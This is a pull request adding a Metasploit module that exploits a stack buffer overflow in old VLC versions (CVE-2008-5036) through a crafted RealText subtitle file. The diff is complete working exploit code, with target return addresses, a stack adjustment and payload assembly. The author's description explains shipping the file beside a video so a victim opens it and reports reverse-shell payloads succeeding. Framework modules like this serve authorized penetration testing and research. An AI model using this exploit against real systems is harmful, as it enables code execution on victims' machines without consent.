### PR TITLE
Added exploit module for CVE-2008-5036

### DIFF
--- a/modules/exploits/windows/fileformat/vlc_realtext.rb
+++ b/modules/exploits/windows/fileformat/vlc_realtext.rb
@@ -1,0 +1,100 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GoodRanking
+
+	include Msf::Exploit::FILEFORMAT
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'VLC Media Player RealText Subtitle Overflow',
+			'Description'    => %q{
+					This module exploits a stack buffer overflow vulnerability in
+				VideoLAN VLC < 0.9.6. The vulnerability exists in the parsing of
+				RealText subtitle files.
+
+				This module generates a specially crafted RealText subtitle file.
+				VLC handles subtitles automatically. It just checks the presence
+				of a subtitle file with the same name of the loaded video. If such
+				a subtitle file is found, VLC loads and parses the file.
+
+				So to exploit the vulnerability the .rt file should be distributed
+				with a video file (.avi as sample) with the same file name. The
+				victim my open the video with the vulnerable VLC Media Player.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Tobias Klein',  # Vulnerability Discovery
+					'SkD', # Exploit
+					'juan vazquez' # Metasploit Module
+				],
+			'Version'        => '$Revision: $',
+			'References'     =>
+				[
+					[ 'OSVDB', '49809' ],
+					[ 'CVE', '2008-5036' ],
+					[ 'BID', '32125' ],
+					[ 'URL', 'http://www.trapkit.de/advisories/TKADV2008-011.txt' ],
+					[ 'URL', 'http://www.videolan.org/security/sa0810.html' ]
+				],
+			'Payload'        =>
+				{
+					'Space'		=> 1900,
+					'DisableNops'	=> true,
+					'BadChars' => "\x00\x22\x0a",
+					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'VLC 0.9.4 on Windows XP SP3 / Windows 7 SP1',
+						{
+							'Ret' => 0x68f0cfad, # jmp esp # libqt4_plugin.dll
+							'WritableAddress' => 0x695d5890 # libqt4_plugin.dll .data
+						}
+					],
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => 'Nov 05 2008',
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptString.new('FILENAME', [ true, 'The file name.',  'msf.rt']),
+			], self.class)
+	end
+
+	def exploit
+
+		my_payload = ""
+		my_payload << Rex::Text.rand_text(72, payload_badchars)
+		my_payload << [target.ret].pack("V") # EIP => jmp esp
+		my_payload << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+8").encode_string # ESP => jmp after "Writable address"
+		my_payload << Rex::Text.rand_text(2, payload_badchars)
+		my_payload << [target['WritableAddress']].pack("V") # Writable address
+		my_payload << payload.encoded
+
+		rt_file = <<-eos
+<window height="250" width="300" duration="15" bgcolor="yellow">
+Mary had a little lamb,
+<br/><time begin="#{my_payload}"/>
+<br/><time begin="6"/>little lamb,
+<br/><time begin="9"/>Mary had a little lamb
+<br/><time begin="12"/>whose fleece was white as snow.
+</window>
+		eos
+
+		print_status("Creating '#{datastore['FILENAME']}' file ...")
+
+		file_create(rt_file)
+
+	end
+end


### PR DESCRIPTION
I would like to make a contribution to metasploit with a module for "CVE-2008-5036: VLC Media Player RealText Demuxer Subtitle File Handling Overflow" with the hope you find it useful.

It's a FILEFORMAT exploit which generates a RealText subtitle file. It should distributed with a video file with the same filename. The video file should be opened witht he vulnerable VLC. I've tested with .avi and .wmv videos successfully.

Vulnerable VLC can be downloaded from oldapps: http://www.oldapps.com/VLC_Player.php?old_vlc=39?download

I've tested on XP SP3 and W7 SP1 successfully with windows/exec and windows/meterpreter_reverse_tcp.

Finally I'm learning and training exploit writing and metasploit dev so any feedback about the code is welcome!

Regards,

juan
